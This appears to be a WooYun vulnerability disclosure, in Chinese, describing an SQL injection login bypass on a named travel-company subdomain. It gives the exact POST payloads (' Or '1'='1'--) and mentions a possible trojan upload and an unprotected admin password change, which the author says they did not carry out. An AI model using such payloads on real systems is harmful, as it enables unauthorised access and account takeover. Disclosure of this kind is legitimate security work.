WooYun.org

首先，我们来看看这个网站！
浏览一下网站，嗯，不错，但是总感觉这个分站有漏洞
于是就找到了一个登录框
对，看到登录框就想试试有没有注入，没想到还真有！
http://aboutus.cits.cn/holiday/login.jsp

当我试试or 1=2 的时候，开始报错
http://aboutus.cits.cn/holiday/login.jsp
post:username=test' or '1'='2'-- &password=test&login=%E7%99%BB%E5%BD%95

当 or 1=1 的时候正常，而已直接登录进来，可以绕过！
http://aboutus.cits.cn/holiday/login.jsp
post:username=test' Or '1'='1'-- &password=test&login=%E7%99%BB%E5%BD%95

既然可以直接登录进来，那我们就好办了！
我们找找编辑器，看能不能上传木马上去！
http://aboutus.cits.cn/holiday/menu_06_01.jsp

在这里，我并没有上传木马上去，不想拿shell
接下来，我们还可以修改管理员的密码！

为什么能直接修改密码呢，我这里就不改你们的密码，免得给你们带来麻烦！
但是我有个小小的建议吧！修改密码这里再加个验证之类的，或者是输入原始的密码才能直接修改！如果遇到坏人的话，就直接破坏了！